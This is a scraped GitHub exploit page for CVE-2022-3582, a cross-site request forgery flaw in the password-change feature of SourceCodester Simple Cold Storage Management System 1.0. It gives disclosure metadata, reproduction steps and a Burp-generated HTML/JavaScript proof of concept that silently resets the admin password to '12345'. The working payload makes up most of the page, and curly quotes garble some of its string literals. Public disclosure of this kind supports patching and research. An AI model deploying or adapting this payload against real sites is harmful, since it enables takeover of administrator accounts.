Headline
CVE-2022-3582: CSRF-/POC at main · jusstSahil/CSRF-
A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211189 was assigned to this vulnerability.
Permalink
Cannot retrieve contributors at this time
# Exploit Title: Simple Cold Storage Management System v1.0 - CSRF ON change password
# Exploit Author: SAHIL PRASAD
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Vulnerable Parameters:
change password
Steps:
Login into admin/user account
Now Go to profile
Now in Parameter password change the password
Hit burpsuite and capture the request
Generate CSRF poc and expoilt that poc in browser
Now got back to the site and log out and login with new password and you will get redirect to the dashboard
Payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('’, '’, ‘/’)</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/csms\/classes\/Users.php?f=save", true);
xhr.setRequestHeader("Accept", “*\/*”);
xhr.setRequestHeader("Content-Type", “multipart\/form-data; boundary=----WebKitFormBoundaryg5STs5oE1IeCxjQy”);
xhr.setRequestHeader("Accept-Language", “en-GB,en-US;q=0.9,en;q=0.8”);
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"id\"\r\n” +
“\r\n” +
“1\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"firstname\"\r\n” +
“\r\n” +
“Adminstrator\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"lastname\"\r\n” +
“\r\n” +
“Admin\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"username\"\r\n” +
“\r\n” +
“admin\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"password\"\r\n” +
“\r\n” +
“12345\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
“Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n” +
“Content-Type: application/octet-stream\r\n” +
“\r\n” +
“\r\n” +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy–\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>